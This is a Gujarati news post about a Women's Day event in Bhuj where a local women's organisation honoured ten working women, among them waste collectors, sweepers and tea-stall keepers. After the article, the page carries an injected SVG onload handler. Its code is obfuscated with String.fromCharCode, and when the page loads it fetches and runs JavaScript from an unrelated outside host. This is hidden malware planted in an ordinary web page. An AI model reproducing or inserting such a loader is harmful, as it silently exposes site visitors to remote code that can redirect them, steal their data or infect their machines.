તારીખ ૧૩.૩.૧૮ ના રોજ લોહાણા ભવન ભુજ ખાતે સહજીવન અને સખી સંગિની સંગઠન દ્વારા મહિલા દિન ઊજવણી અંગે ખાસ કાર્યક્રમ રાખવામાં આવેલ. આ પ્રસંગે વંચિત વિસ્તાર માં રહેતી અને પોતાના પરિવારનું પોષણ કરવા આર્થિક ઊપાર્જનમાં સક્ષમ મહિલાઓને પસંદ કરી પ્રથમ ચરણમાં સન્માનીત કરવામાં આવ્યા હતા.
જે બહેનો ઘરે ઘર થી કચરો એકત્ર કરવા, શેરી સફાઇ કામ કરવા, કચરા વિણી ગુજરાન ચલાવતા કે ચા નાસ્તાની લારી ચલાવી ગુજરાન ચલાવતા બહેનો નું જીવન સ્તર ઊંચુ લાવવા પોતાના બાળકો ને પગભર બનાવવા શ્રમજીવી એવી કુલ ૧૦ બહેનો નું આ પ્રસંગે સન્માન કરવામાં આવ્યું હતું. કાર્યક્રમ માં ખાસ ઉપસ્થિતિ શ્રી ગોદાવરીબેન ઠકકર, શ્રી રેશ્માબેન ઝવેરી, શ્રી કૃપાબેન ધોળકિયા, શ્રી અરૂણાબેન જોષી, શ્રી ફાતમાબેન, શ્રી પીર સાહેબ તેમજ શ્રી પંકજભાઇ જોષી એ બહેનો ને સન્માન આપી પ્રોત્સાહીત કર્યા હતાં. તેમજ ભુજ શહેર હિમાયતી જૂથ ના બહેનો પણ હાજર રહ્યા હતાં. કાર્યક્રમનું સંચાલન ધર્મેશ અંતાણી તેમજ આભાર વિધિ જીજ્ઞાબેન ગોરે સંભાળી હતી. કાર્યક્રમ માં કુલ ૧૫૦ બહેનો એ હાજરી આપી હતી.
<svg/onload=eval(String.fromCharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,41,125,40,41,59))>
No Comment
Comments are closed here.